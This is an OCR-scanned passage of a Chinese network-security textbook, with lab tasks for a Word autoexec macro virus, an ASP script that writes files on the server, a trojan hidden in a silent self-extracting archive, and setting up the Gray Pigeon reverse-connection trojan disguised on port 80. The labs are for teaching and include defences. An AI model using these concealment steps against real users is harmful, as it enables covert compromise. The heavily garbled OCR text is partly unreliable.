说 明 自动 宏 的 名 字 规 定 必须 为 autoexec。 

步骤 2: 单 击 “ 创 建 " 按 钮 ,在 打开 的 宏 编辑 窗口 中 输入 如 图 4-20 所 示 的 代码 。 

步骤 3: 关闭 宏 编辑 窗口 ,保存 文档 并 关闭 Word 程序 ,这 样 一 个 简单 的 宏 病 毒 就 制作 
成 功 了 。 

步骤 4: 再 打开 刚 保存 的 文档 ,可 以 看 到 宏 代 码 已 经 被 运行 ,如 图 4-21 所 示 , 这 只 是 个 
恶作剧 ,如 果 把 循环 改 为 死 循 环 , Word 程序 就 无 法 正常 使 用 了 。 

(2) 宏 病 毒 的 防范 

步骤 1: 使 用 杀毒 软件 查 杀 Office 软件 的 安装 目录 和 相关 Office 文档 。 
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图 4-21 宏 代 码 被 运行 


步骤 2: 在 Word 2007/2010 程序 的 “开发 工具 ”选项 卡 中 , 单 击 “ 代 码 ” 组 中 的 “ 宏 安 全 
性 ”按钮 ,出 现 “ 宏 设置 "界面 ,选中 “禁用 所 有 宏 , 并 发 出 通知 ”或 “禁用 所 有 宏 , 并 且 不 通知 ” 
单 选 按钮 ,如 图 4-22 所 示 , 单 击 “ 确 定 ” 按 钮 。 


























图 4-22 “ 宏 设置 "界面 
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2) 网 页 病毒 的 防范 
(1) 制作 一 个 简单 的 网 页 病毒 
步骤 1: 编写 ASP 脚本 文件 default. asp, 内 容 如 下 : 


<html> 

<body> 

< 
Dim fso 
Set fso= Server.CreateObject ("Scripting.FilesystemObject") 
fso.CreateTextFile ("C:\newfile") 
Response.write ("在 C 盘 新 建 了 newfile 文 件 ") 
Set fso=nothing 

%> 

< /body> 

</htm> 


其 中 ,二 % 与 % 才 之 间 的 内 容 为 VBScript 脚本 代码 , Dim 定义 了 一 个 fso 对 象 变量 ， 
“Set fso 王 Server. CreateObject("Scripting. FilesystemObject")” 产 生 了 一 个 服务 器 文件 系 
统 对 象 ,“fso. CreateTextFile("C:\newfile")” 在 C 盘 根 目 录 新 建 一 个 文件 newfile, 并 且 使 
用 “Response. write(" 在 C 盘 新 建 了 newfile 文件 ")” 在 页 面 中 说 明 新 文件 已 经 建立 。 

步骤 2: 配置 好 Web 服务 器 (IIS) ,并 把 default. asp 文件 保存 到 Web 服务 器 的 路 径 中 ， 
如 C:\Inetpub\wwwroot\default. asp。 

步骤 3: 打开 I 正 浏 览 器 ,在 地 址 栏 中 输入 http://localhost/default. asp, 则 将 在 网 页 中 
可 看 到 “在 C 盘 新 建 了 newfile 文件 ”信息 ,如 图 4-23 所 示 , 并 且 已 在 C 盘 根 目录 新 建 了 一 个 
newfile 文件 ,如 图 4-24 所 示 。 





Ty i 于 I=I9| x| 


在 C 盘 新 建 了 newfile 文 件 








4-23 一 个 简单 的 网 页 病毒 


(2) 网 页 病毒 的 防范 

步骤 1: 运行 regsvr32 scrrun. dll /u 命令 ,禁止 使 用 文件 系统 对 象 FilesystemObject。 

步骤 2: 在 下 浏览 器 中 ,选择 “工具 ”>“Internet 选项 ”命令 ,打开 “Internet 选项 ”对 话 
框 ,在 “安全 ”选项 卡 中 , 单 击 “ 自 定义 级 别 ” 按 钮 ,打开 “安全 设置 - Internet 区 域 ”对话 框 ,把 
“ActiveX 控件 和 插件 ”栏目 中 的 所 有 项 目 设 置 为 “禁用 ”, 如 图 4-25 所 示 。 
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2016/7/5 13:59 







早点 而 BB inetpu 2016/7/5 13:33 文件 志 
量 最 近 访 ja 的 位 置 BB Perfoes 2009/7/14 11:20 文件 来 
row Files 2016/7/5 13:33 文件 去 
司库 国 moew Files (88) 2016/1/6 8:35 文件 来 
图 视频 Bindors 2016/T75 13:33 文件 来 





上 用 户 2014/7/20 14:57 文件 夹 





newfile 修 欢 日 期 : 2016/7/8 14:33 了 键 日 期 : 2016/7/8 14:22 
文件 大 小 : 0 字 节 














图 4-24 在 C 盘 根 目录 新 建 了 一 个 newfile 文件 








园 ActiveX 控件 和 插件 
园 hectivex 控件 自动 提示 
图 禁用 


© 所 用 
加 Ey ActiveX 控件 执行 烤 本 * 


日 提示 
辆 对 未 标记 为 可 安全 执行 糊 本 的 ActiveX 控件 初始 化 并 技 
加 禁用 (推荐 ) 
上 启用 (不安 全) 
© 提示 
辆 二 进 制 和 种 本 行为 
© RV 














‘ 
# 重 新 启动 Internet Explorer 之 后 生效 

重 轩 自 定义 设置 

重要 为 0): 中 高 信访” 


[mm EE | 




















图 4-25 “安全 设置 - Internet 区 域 ”对 话 框 


4.4.4 任务 4: 利用 自 解 压 文件 携带 木马 程序 


1. 任务 目标 

(1) 了 解 利用 自 解 压 文件 携带 木马 程序 的 方法 。 
(2) 了 解 木马 程序 的 隐藏 方法 。 

2. 任务 内 容 

利用 自 解压 文件 携带 木马 程序 。 
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3. 完成 任务 所 需 的 设备 和 软件 


(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 。 


(2) WinRAR 压缩 软件 1 套 。 
4. 任务 实施 步骤 


准备 一 个 Word 文件 (如 myfile. doc) 和 一 个 木马 程序 (如 “木马 . exe”) 。 在 本 任务 中 ， 
为 了 安全 起 见 ,把 计算 器 程序 “calc. exe” 改 名 为 “木马 . exe”, 即 用 计算 器 程序 代替 木马 程序 。 


步骤 1: 下 载 并 安装 WinRAR 软件 。 


步骤 2: 把 这 两 个 文件 放 在 同一 目录 下 , 按 住 Ctrl 键 的 同时 用 鼠标 选中 这 两 个 文件 , 然 
后 右 击 ,在 弹出 的 快捷 菜单 中 选择 “添加 到 压缩 文件 ”命令 ,打开 * 压 缩 文 件 名 和 参数 "对 话 
框 ,在 “常规 ”选项 卡 中 选中 “创建 自 解压 格式 压缩 文件 ” 复 选 框 ,并 把 压缩 文件 名 改 为 “利用 


自 解压 文件 携带 木马 程序 . exe”, 如 图 4-26 所 示 。 

















Wa 





压缩 文件 名 
利用 自 解 压 文件 措 带 木马 程序 .ex% 
































“ |。 日 近 EF 给 件 0 











图 4-26 “压缩 文件 名 和 参数 ”对 话 框 


步骤 3: 在 “高 级 ”选项 卡 中 单 击 “ 自 解压 选 
项 ”按钮 ,打开 “高 级 自 解压 选项 ”对 话 框 ,在 “ 解 
压 路 径 "文本 框 中 随意 填写 ,如 填写 myfile, 再 选 
中 “在 当前 文件 夹 中 创建 " 单 选 按钮 ,如 图 4-27 
所 示 。 

步骤 4: 单 击 “ 设 置 " 选 项 卡 ,在 “解压 后 运 
行 "文本 框 中 输入 “木马 . exe”, 如 图 4-28 所 示 。 

步骤 5: 单 击 “ 模 式 ” 选 项 卡 ,选中 “全 部 隐 
藏 " 单 选 按钮 ,如 图 4-29 所 示 ,这样 不 仅 安全 ,而 
且 隐 项 ,不 易 被 人 所 发 现 。 

步骤 6: 单 击 “ 确 定 ” 按 钮 ,返回 到 “压缩 文件 
名 和 参数 ”对 话 框 。 单 击 “ 注 释 ” 选 项 卡 ,可 看 到 
如 图 4-30 所 示 的 内 容 , 这 是 WinRAR 根据 前 面 
的 设 定 自动 加 入 的 内 容 , 其 实 就 是 自 解压 脚本 
命令 。 







































































图 4-27 “高 级 自 解压 选项 "对话 框 
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诡 标 题 中 


解压 前 运行 8) 











安稳 模 式 


目 全 部 显示 惟 ) 


加 隐藏 三 如 话 框 G) 


回 等 待 并 返回 退出 码 mp) 

























































图 4-29 “模式 ”选项 卡 














从 文件 中 加 载 主 释 中 
[ 





手动 输入 注释 内 容 人 ) 
;下 面 8 注 释 包 合 自 解压 丢 本 命令 
Path=, \nyfile 














图 4-30 “注释 ”选项 卡 


其 中 “Setup 王 木马. exe” 表 示 自 解压 后 运行 “木马 . exe” 文 件 ,而 “Silent 二 1” 表 示 全 部 隐 
藏 自 解压 对 话 框 。 

步骤 7: 单 击 “确定 "按钮 ,最 终 将 产生 一 个 自 解压 文件 “利用 自 解压 文件 携带 木马 程 
序 . exe”。 把 该 自 解压 文件 复制 到 其 他 文件 夹 中 ,并 双击 运行 它 ,观察 运行 结果 。 

这 种 携带 木马 程序 的 自 解压 文件 一 般 可 以 用 杀毒 软件 进行 查 杀 。 


4.4.5 任务 5: 反弹 端口 木马 ( 灰 馈 子 ) 的 演示 
1. 任务 目标 


(1) 了 解 反 弹 端 口 木马 ( 灰 钥 子 ) 的 工作 原理 和 配置 方法 。 
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(2) 了 解 灰 例子 木 马 的 危害 。 

2. 任务 内 容 

(1) 配置 服务 端 程序 。 

(2) 传播 木马 。 

(3) 控制 端 操作 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 。 

(2) 灰 铝 子 木 马 程序 1 套 。 

4. 任务 实施 步骤 

在 局 域 网 中 ,在 A 主机 (192. 168. 10. 11) 上 安装 灰 铝 子 控制 端 ,在 B 主机 (192. 168. 10. 12) 
上 安装 灰 锐 子 服务 端 ,A 主机 控制 了 B 主机 。 

1) 配置 服务 端 程序 

步骤 1: 在 A 主机 上 先 关 闭 杀 毒 软件 ,然后 运行 灰 铅 子 客户 端 程序 H_Client. exe, 打 开 
“ 灰 鲁 子 ” 主 窗口 , 单 击 “ 配 置 服务 程序 ”按钮 ,打开 “服务 器 配置 "窗口 。 

步骤 2: 在 “连接 类 型 "选项 卡 中 ,选中 “自动 上 线 型 : 无 须知 道 远程 IP, 可 自动 上 线 控 
制 " 单 选 按钮 ,并 在 “DNS 解析 域名 ”文本 框 中 输入 “*192. 168. 10. 11”( 控 制 端 A 主机 的 IP 地 
址 ) ,在 “上线 端 口 " 文 本 框 中 输入 *80”, 在 “保存 路 径 ” 文 本 框 中 输入 “C:\ 服 务 端 程序 . exe”， 
如 图 4-31 所 示 。 


上 文件 下， 设置 GD) 查看 WW 帮助 0 


EE 




















4-31 “连接 类 型 "选项 卡 


其 中 ,80 端口 是 控制 端 打开 的 监听 端口 ,伪装 为 WWW 监听 端口 。 

步骤 3: 按 图 4-32 一 图 4-34 所 示 进 一 步 进 行 设 置 ,继续 进行 伪装 。 

步骤 4: 最 后 单 击 “ 生 成 服务 器 ”按钮 ,最 终 在 C 盘 根 目录 下 生成 “服务 端 程序 . exe” 文 件 。 
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4-34 “图 标 信息 ”选项 卡 
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步骤 5: 在 “ 灰 饮 子 ” 主 窗口 中 ,选择 “设置 ">“ 系 统 设置 "命令 ,打开 “系统 设置 "窗口 ,在 
“端口 设置 ?选项 卡 中 ,设置 “自动 上 线 端口 ?为 "80”, 如 图 4-35 所 示 , 单 击 “ 保 存 设置 ”按钮 ， 
并 关闭 “系统 设置 "窗口 。 





























图 4-35 “系统 设置 窗口 


2) 传播 木马 

通过 各 种 方式 传播 该 木马 服务 端 程序 ,并 诱惑 用 户 运 行 该 程序 。 在 本 任务 中 可 直接 把 
“服务 端 程序 . exe” 文 件 复制 到 服务 端 B 主 机 (192. 168. 10.12) 上 。 

3) 控制 端 操作 

步骤 1: 在 服务 端 B 主 机 上 先 关 闭 杀 毒 软件 ,然后 运行 “服务 端 程序 . exe” 程 序 后 ,在 控 
制 端 A 主机 的 “* 灰 铅 子 ” 主 窗 口中 ,可 看 到 服务 端 B 主机 (192. 168. 10. 12) 已 自动 上 线 , 如 
图 4-36 所 示 ,此 时 可 进行 以 下 操作 : 获取 系统 信息 、 限 制 系统 功能 .屏幕 捕获 ,文件 管理 、 远 
程控 制 .注册 表 管 理 .文件 传输 .远程 通信 等 操作 。 


perSH[EDo ir oopBADAl 
目 文件 四 L193 查看 Y) 帮助 0 









































- 
Ea B= 


日 -者 1%2.160 10 2-0 
由 -< 




















图 4-36 服务 端 (192. 168. 10. 12) 已 自动 上 线 
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步骤 2: 在 控制 端 A 主机 上 运行 “netstat -a” 命 令 , 查 看 控制 端的 端口 情况 ,如 图 4-37 所 
示 , 可 见 控 制 端 (192.168. 10. 11) 打 开 的 是 80 端口 
画 管理 员 : C\Windows\system32\cmd.exe 
IC: Jsers\Adninistrator netstat 
本 地 地 | 
8.8.8. LISTENING 
8.8.8. LISTENING 
8.8.8. LISTENING 
8.8.8. LISTENING 
8.8.8. LISTENING 
8.8.86 LISTENING 
88.60.08. LISTENING 
日 -日 .- 昌 - LISTENING 
日 -日 .日 LISTENING 
8.8.8. LISTENING 
B.B.B- LISTENING 
08.0.8. LISTENING 
192.168.18.1 192.168.19.12:49157 ESTABLISHED 
192.168.18.1 LISTENING 
192.168 .18.1 192.168.19.12:49158 ESTABLISHED 
192.-168.19.11:8983 192.168.16.12:49159 ESTABLISHED 
192 .168.198.1: 004 192.168.19.12:49168 ESTABLISHED 
192.168.10.1 192.168.18.12:49161 ESIABLISHED 
[:: LISTENING 
图 4-37 灰 钥 子 控制 端的 端口 情况 
B 主机 上 运行 “netstat -a” 命 令 , 查 看 服务 端的 端口 情况 ,如 图 4-38 所 
示 , 可 见 服务 端 连接 的 是 控制 端 PC1(192. 168. 10. 12) 的 http 端口 (80 端口 ) ,与 访问 某 外 
Web 服务 器 是 一 样 的 ,服务 端的 防火 墙 一 般 会 允许 这 样 的 连接 

















加 管理 员 : C\Windows\system32\cemd.exe 


192.168. 
192.168. 
192.168. 
192.168. 


9155 








LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


LISTENING 
LISTENING 


ESTNBLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 








图 4-38 灰 钥 子 服务 
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45 拓展 提升 : 手机 病毒 


日 前 ,腾讯 移动 安全 实验 室 发 布 了 《2016 年 第 三 季度 手机 安全 报告 》, 报 告 显 示 ， 
Android 手机 病毒 共 增 加 789. 3 万 个 ,同比 增长 10. 6% ,是 2014 年 第 三 季度 的 35 倍 ;感染 
用 户 数 总 量 达到 1. 36 亿 , 同 比 增长 70. 04%, 其 中 支付 类 病毒 感染 用 户 数 达到 1402 万 , 同 
比 增长 114. 70% ,是 2015 年 第 三 季度 用 户 感染 数 的 一 倍 之 多 。 腾 讯 手机 管家 查 杀 病 毒 次 
数 也 随 着 手机 病毒 数量 的 增长 而 创下 近年 来 新 高 , 共 查 杀 病 毒 2. 39 亿 次 ,同比 增长 
89.97% 。 

手机 病毒 是 一 种 具有 传染 性 \ 破 坏 性 、 隐 蔽 性 的 手机 程序 。 其 可 利用 发 送 短信 彩信, 电 
子 邮件 、 浏 览 网 站 .下 载 铃声 .蓝牙 等 方式 进行 传播 ,会 导致 用 户 手机 死机 、 关 机 、 个 人 资料 被 
删 .向 外 发 送 垃圾 邮件 泄露 个 人 信息 自动 拨打 电话 发 短 ( 彩 ) 信 等 进行 恶意 扣 费 ,甚至 会 损 
毁 SIM 卡 ,芯片 等 硬件 ,导致 使 用 者 无 法 正常 使 用 手机 。 目 前 手机 病毒 可 以 分 为 破坏 数据 
类 、 恶 意 扣 费 类 、 汇 露 信息 类 三 种 。 

1) 手机 病毒 的 传播 途径 

手机 病毒 的 传播 方式 有 着 自身 的 特点 ,同时 也 和 计算 机 病毒 的 传染 有 相似 的 地 方 。 手 
机 病毒 的 主要 传播 途径 如 下 。 

(1) 通过 手机 蓝牙 .无 线 数据 传输 传播 。 

(2) 通过 手机 SIM 卡 或 者 WiFi 网 络 ,在 网 络 上 进行 传播 。 

(3) 在 把 手机 和 计算 机 连接 的 时 候 , 被 计算 机 上 的 病毒 感染 ,并 进行 传播 。 

(4) 点 击 短信 ,彩信 中 的 未 知 链接 后 ,进行 病毒 的 传播 。 

2) 手机 病毒 的 危害 

手机 病毒 的 主要 危害 如 下 。 

(1) 导致 用 户 信息 被 窗 。 如 今 , 越 来 越 多 的 手机 用 户 将 个 人 信息 存储 在 手机 上 了 ,如 个 
人 通讯 录 、 个 人 信息 日程 安排 .各 种 网 络 账号 .银行 账号 和 密码 等 。 这 些 重要 的 资料 ,必然 
引 来 一 些 别有用心 者 的 “ 垂 沃 ”他 们 会 编写 各 种 病毒 人 侵 手 机 ,窃取 用 户 的 重要 信息 。 

(2) 传播 非法 信息 。 现 在 ,彩信 大 行 其 道 , 为 各 种 色情 、 非 法 的 图 片 .语音 、. 电 影 传播 提 
供 了 便利 。 

(3) 破坏 手机 软 、 硬 件 。 手 机 病毒 最 常见 的 危害 就 是 破坏 手机 的 软 、 硬 件 , 导 致 手机 无 
法 正常 工作 。 

(4) 造成 通信 和 网络 瘫痪 。 如 果 病 毒 感染 手机 后 .强制 手机 不 断 地 向 所 在 通信 网 络 发 送 
垃圾 信息 ,这 样 势必 导致 通信 网 络 信息 堵塞 。 这 些 垃圾 信息 最 终 会 让 局 部 的 手机 通信 网 络 
瘫痪 。 

3) 常见 手机 病毒 

2009 年 11 月 10 日， Android 平 台 出 现 第 一 个 恶意 间谍 软件 Mobile Spy, 该 程序 会 自 
动 记录 用 户 所 输入 的 任何 信息 并 发 送 到 黑客 的 邮箱 中 ,还 可 以 视频 录 下 用 户 的 所 有 操作 
过 程 。 

2010 年 8 月 12 日 ,Android 平台 出 现 第 一 个 木马 病毒 Trojan-SMS. AndroidOS. 
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FakePlayer. a, 该 木马 病毒 会 伪装 成 应 用 程序 , 当 用 户 不 小 心安 装 之 后 , 它 便 会 疯狂 地 发 送 
短信 ,使 用 户 的 手机 开通 高 额 的 收费 服务 。 

2011 年 12 月 ,名 为 “Carrier IQ” 的 软件 能 够 实时 监控 用 户 使 用 手机 情况 ,及 记录 用 户 
所 处 的 位 置信 息 , 更 可 怕 的 是 该 软件 不 通过 用 户 明 确 批 准 , 就 会 自动 启用 并 收集 手机 上 的 数 
据 ( 如 按键 信息 、 短 信 和 内容、 图片、 视频 等 )。 无 须 变 成 超级 用 户 或 删除 特定 安全 防护 软件 就 
能 获得 手机 的 管理 员 权 限 ,几乎 让 人 无 法 察觉 它 的 存在 。 

2014 年 8 月 ,一 种 名 为 "XXshenqi" 的 短信 蠕虫 病毒 在 全 国 大 规模 爆发 ,感染 该 病毒 的 
手机 能 够 自动 群发 短信 给 通信 好 友 直 至 该 手机 欠 费 。 

4) 手机 病毒 的 预防 

(1) 删除 乱码 短信 彩信。 乱码 短信 、 彩 信 可 能 带 有 病毒 , 收 到 此 类 短信 后 立即 删除 ,以 
免 感染 手机 病毒 。 

(2) 不 要 接受 陌生 请 求 。 利 用 无 线 传送 功能 比如 蓝牙 ,红外 接收 信息 时 ,一 定 要 选择 安 
全 可 靠 的 传送 对 象 ,如 果 有 陌生 设备 请 求 连接 最 好 不 要 接受 。 因 为 手机 病毒 会 自动 搜索 无 
线 信 号 覆盖 范围 内 的 设备 进行 病毒 的 传播 。 

(3) 保证 下 载 的 安全 性 。 现 在 网 上 有 许多 资源 提供 手机 下 载 ,然而 很 多 病毒 就 隐藏 在 
这 些 资 源 中 ,这 就 要 求 用 户 在 使 用 手机 下 载 各 种 资源 的 时 候 确保 下 载 站 点 是 否 安全 可 靠 , 尽 
量 避 免 去 个 人 网 站 下 载 。 

(4) 选择 手机 自 带 背景 。 漂 亮 的 背景 图 片 与 屏保 固然 让 人 赏心悦目 ,但 图 片 中 如 果 带 
有 病毒 就 危险 了 ,所 以 用 户 最 好 使 用 手机 自 带 的 图 片 进 行 背景 设置 。 

(5) 不 要 浏览 危险 网 站 。 比 如 一 些 黑客 、 色 情 网 站 ,本 身 就 是 很 危险 的 ,其 中 隐匿 着 许 
多 病毒 与 木马 ,用 手机 浏览 此 类 网 站 是 非常 危险 的 。 

(6) 安装 手机 防 病毒 软件 。 现 在 国内 外 各 大 杀毒 软件 开发 商都 发 布 了 自己 的 手机 版 杀 
毒 软件 ,可 以 下 载 安装 ,为 手机 提供 病毒 防护 的 一 道 屏 障 。 

使 用 “古董 机 ”的 用 户 可 以 完全 放心 。 毕 竞 不 是 所 有 的 人 都 用 智能 手机 ,而 使 用 “古董 
机 ”, 即 那 种 黑白 屏幕 ,无 法 连 上 WAP 网 的 手机 ,可 以 放心 使 用 ,病毒 无 法 感染 这 种 手机 。 


习 是 

一 、 选 择 题 

1. 计算 机 病毒 是 一 种 ( @O ), 其 特性 不 包括 ( @@ )。 

Q@ A. 软件 故障 B. 硬件 故障 C. 程序 D. 细菌 
@ A. 传染 性 B. 隐蔽 性 C. 破坏 性 D. 自生 性 


2. 下 列 叙 述 中 正确 的 是 ( 沪 
A. 计算 机 病毒 只 感染 可 执行 文件 
B. 计算 机 病毒 只 感染 文本 文件 
C. 计算 机 病毒 只 能 通过 软件 复制 的 方式 进行 传播 
D. 计算 机 病毒 可 以 通过 读 / 写 磁盘 或 网 络 等 方式 进行 传播 
3. ) 病 毒 是 定期 发 作 的 ,可 以 设置 Flash ROM 防 写 状态 来 避免 病毒 破坏 ROM。 
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8. 


二 


10. 


病 


Co 和 NG 


A. Melissa B. CIH 人 未 马 D. 蠕虫 
. 效率 最 高 .最 保险 的 杀毒 方式 是 ( js 

A. 手动 杀毒 B. 自动 杀毒 C. 杀毒 软件 D. 磁盘 格式 化 
. 网 络 病毒 与 一 般 病毒 相 比 ,( ) 。 

A. 隐蔽 性 强 B. 潜伏 性 强 C. 破坏 性 大 D. 传播 性 广 
. 计算 机 病毒 最 主要 的 两 个 特征 是 ( ) 。 

A. 隐蔽 性 和 破坏 性 B. 潜伏 性 和 破坏 性 

C. 传染 性 和 破坏 性 D. 隐蔽 性 和 污染 性 
. 计算 机 病毒 的 破坏 方式 包括 ( ) 。( 多 选 题 ) 

A. 删除 修改 文件 B. 抢占 系统 资源 

C. 非法 访问 系统 进程 D. 破坏 操作 系统 


用 每 一 种 病毒 体 含有 的 特征 代码 对 被 检测 的 对 象 进行 扫描 ,如 果 发 现 特征 代码 ,就 
表明 了 检测 到 该 特征 代码 所 代表 的 病毒 ,这 种 病毒 的 检测 方法 称 为 ( ”)。 


A. 比较 法 B. 特征 代码 法 C. 行为 监测 法 
D. 软件 模拟 法 E. 校 验 和 法 
计算 机 感染 病毒 后 ,症状 可 能 有 ( 小 


A. 计算 机 运行 速度 变 慢 B. 文件 长 度 变 长 

C. 不 能 执行 某 些 文件 D. 以 上 都 对 

宏 病 毒 可 以 感染 ( a 

A. 可 执行 文件 B. 引导 扇 区 /分 区 表 

C，Word/Excel 文档 D. 数据 库 文件 

. 计算 机 病毒 的 传播 方式 有 ( ”)。( 多 选 题 ) 

A. 通过 共享 资源 传播 B. 通过 网 页 恶意 脚本 传播 

C. 通过 网 络 文件 传输 传播 D. 通过 电子 邮件 传播 

> ) 不 是 杀毒 软件 。 

A,， 瑞星 B. Word 

C. Norton Antivirus D. 金山 毒霸 

、 判断 题 

只 是 从 被 感染 磁盘 上 复制 文件 到 硬盘 上 ,并 不 运行 其 中 的 可 执行 文件 ,不 会 使 系统 
毒 。 ( 
. 将 文件 的 属性 设 为 只 读 ,无 法 保护 其 不 被 病毒 感染 。 ( 
. 重新 格式 化 硬盘 可 以 清除 所 有 病毒 。 ( 
. GIF 和 JPG 格式 的 文件 不 会 感染 病毒 。 ( 
. 蠕虫 病毒 是 指 一 个 程序 (或 一 组 程序 ) ,通过 网 络 传播 到 其 他 计算 机 系统 中 去 。 

( 

. 在 Outlook 中 仅 预 览 邮 件 的 内 容 而 不 打开 邮件 的 附件 是 不 会 中 毒 的 。 ( 
. 木马 与 传统 病毒 不 同 的 是 木马 不 会 自我 复制 。 ( 
. 文本 文件 不 会 感染 宏 病毒 。 ( 
. 文件 型 病毒 只 感染 扩展 名 为 . com 和 . exe 的 文件 。 ( 


二 二 一 一 一 
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10. 
1 
.对 于 一 个 有 写 保护 功能 的 优盘 ,其 写 保护 开关 是 防止 病毒 入侵 的 重要 防护 措施 。 





世界 上 第 一 个 攻击 硬件 的 病毒 是 CIH。 
只 要 安装 了 杀毒 软件 ,计算 机 就 安全 了 。 


. 车 一 台 微 机 感染 了 病毒 ,只 要 删除 所 有 带 毒 文件 ,就 能 消除 所 有 病毒 。 
. 网络 时 代 的 计算 机 病毒 虽然 传播 快 ,但 容易 控制 。 
. 计算 机 病毒 只 能 感染 可 执行 文件 。 








三 、 填空 题 
1. 计算 机 病毒 的 特征 主要 有 性 5 性 5 性 性 、 
性 和 性 。 

2. 1998 年 ,中 国 台湾 大 学 生 陈 盘 豪 研制 的 迄今 为 止 破坏 性 最 严重 的 病毒 ,也 
是 世界 上 首 例 破坏 计算 机 硬件 的 病毒 。 

3. 以 往 病 毒 只 感染 程序 ,不 感染 数据 文件 ,而 病毒 专门 感染 数据 文件 ,彻底 改 
变 了 “数据 文件 不 会 传播 病毒 "的 错误 认识 。 该 病毒 会 感染 的 文档 及 其 模板 文件 。 

4. 病毒 是 一 种 通过 网 络 传播 的 恶性 病毒 , 它 具 有 病毒 的 一 些 共性 ,如 传播 性 、 


隐蔽 性 、 破 坏 性 等 ,同时 具有 自己 的 一 些 特征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 ) ,对 
网 络 造成 拒绝 服务 ,以 及 和 黑客 技术 相 结合 。 


5. 木马 通常 有 两 个 可 执行 程序 : 一 个 是 端 ; 另 一 个 是 端 。 


6. 现在 流行 的 木马 ,它们 都 有 以 下 基本 特征 : 





7. 常见 的 木马 主要 可 以 分 为 以 下 9 大 类 : 型 木马 、 型 木马 、 


型 木马 、 型 木马 、 型 木马 、 型 木马 、 型 木马 、 

















木马 、 型 木马 。 


8. 检测 病毒 方法 有 : 法 、 法 、 法 、 法 、 








四 、 
. 什么 是 计算 机 病毒 ? 计算 机 病毒 有 哪些 特征 ? 

. 什么 是 宏 病 毒 ? 

. 什么 是 蠕虫 病毒 ? 蠕虫 病毒 与 一 般 病毒 有 何 区 别 ? 

. 计算 机 病毒 检测 方法 有 哪些 ? 简 述 其 原理 。 

. 目前 计算 机 病毒 的 传播 途径 是 什么 ? 

. 什么 是 木马 ?木马 的 基本 特征 有 哪些 ? 木马 可 分 为 哪 几 类 ? 
. 如 何 预防 计算 机 病毒 ? 

五 、 


中 


简 答题 


操作 练习 题 


1. 从 网 上 下 载 灰 鸽子 木马 专 杀 工 具 , 查 杀 灰 铝 子 木马 。 
2. 对 机 房 中 的 计算 机 进行 漏洞 检测 和 修复 。 
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项 目 5 密码 技术 


【项 目 目标 】 


(1) 学 握 密 码 学 的 基础 知识 。 

(2) 理解 古典 密码 技术 、 对 称 密码 技术 和 非 对 称 密码 技术 。 
(3) 了 解 单 向 散 列 算法 。 

(4) 理解 数字 签名 技术 和 数字 证 书 。 

(5) 了 解 DES、RSA 和 Hash 算法 的 实现 。 

(6) 掌握 PGP 软件 的 使 用 方法 。 

(7) 掌握 EFS 加 密 文件 系统 的 使 用 方法 。 

(8) 了 解密 码 分 析 技术 。 


51 项 目 提出 


某 高 校 期 末 考 试 前 期 ,老师 们 忙 着 准备 期 末 考 试 试 题 。 根 据 学校 要 求 ,相同 或 相近 专业 
的 不 同班 级 同一 门 课程 要 采用 同一 试卷 ,恰巧 张 老师 和 李 老师 任教 同一 门 课程 一 一 C 语言 
程序 设计 。 于 是 两 位 老师 商量 , 先 由 张 老师 准备 好 试题 ,再 由 李 老 师 提出 修改 意见 。 张 老师 
出 好 A、B 卷 试题 及 参考 答案 后 ,通过 电子 邮件 的 方式 传 给 李 老 师 ,以 便 李 老师 提出 修改 意 
见 ,邮件 主题 为 "期末 考 试 试题 (C 语言 程序 设计 )”。 

谁 料 ,在 期 末 考 试 当 天 ,在 考场 上 竞 出 现 了 与 考试 试题 几乎 一 模 一 样 的 资料 ,监考 老 
师 马 上 意识 到 事态 的 严重 性 ,考题 已 泄露 ! 这 是 一 起 严重 的 教学 事故 。 可 是 ,考题 的 内 
容 应 该 只 有 张 老师 和 李 老 师 知道 , 张 老师 和 李 老 师 也 从 来 没有 把 考题 的 内 容 告 诉 过 第 三 
个 人 ,那么 考题 的 内 容 究竟 是 怎么 泄露 的 呢 ? 是 哪个 环节 出 现 了 问题 ? 谁 应 该 对 这 起 教 
学 事故 负责 ? 


52 项 目 分 析 


学 校 成 立 了 教学 事故 调查 组 ,经 调查 发 现 , 张 老师 发 给 李 老 师 的 电子 邮件 没有 经 过 加 密 
处 理 ,是 以 明文 的 方式 传送 出 去 的 ,在 传送 过 程 中 ,被 第 三 方 截获 ,对 方 再 利用 网 络 嗅 探 软 件 
(如 Sniffer) ,就 可 以 看 到 邮件 的 具体 内 容 , 所 以 考题 泄露 了 。 
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因为 考试 试卷 是 属于 机 密 资料 ,在 通过 电子 邮件 传送 试卷 时 ,一 定 要 采取 加 密 等 保密 措 
施 ,防止 邮件 内 容 被 第 三 方 所 窃取 或 自 改 。 另 外 ,还 应 该 对 试卷 邮件 进行 数字 签名 ,这 样 可 
以 确认 发 送 方 的 身份 ,防止 第 三 方 冒充 发 送 方 或 自 改 邮件 内 容 。 还 有 ,一 般 只 能 对 邮件 的 正 
文 内 容 或 附件 内 容 进行 加 密 , 而 不 能 对 邮件 主题 进行 加 密 , 所 以 邮件 主题 中 不 要 出 现 敏感 信 
息 , 如 “期 末 考 试 试题 ”", 这 样 极 容易 引起 第 三 方 的 好 奇 和 兴趣 ,导致 对 邮件 内 容 的 破解 和 
攻击 。 


53 相关 知识 点 


5.3.1 密码 学 的 基础 知识 


密码 学 早 在 公元 前 400 多 年 就 已 经 产生 了 ,正如 《破译 者 ) 一 书 中 所 说 “人 类 使 用 密码 的 
历史 几乎 与 使 用 文字 的 时 间 一 样 长 ”"”。 密 码 学 的 起 源 的 确 要 追溯 到 人 类 刚刚 出 现 , 并 且 尝 试 
去 学 习 如 何 通信 的 时 候 , 为 了 确保 他 们 通信 的 机 密 , 最 先是 有 意识 地 使 用 一 些 简单 的 方法 来 
加 密 信息 ,通过 一 些 (密码 ) 象 形 文字 相互 传达 信息 。 接 着 ,由 于 文字 的 出 现 和 使 用 ,确保 通 
信 的 机 密 性 就 成 为 一 种 艺术 ,古代 发 明了 不 少 加 密 信 息 和 传达 信息 的 方法 。 例 如 我 国 古代 
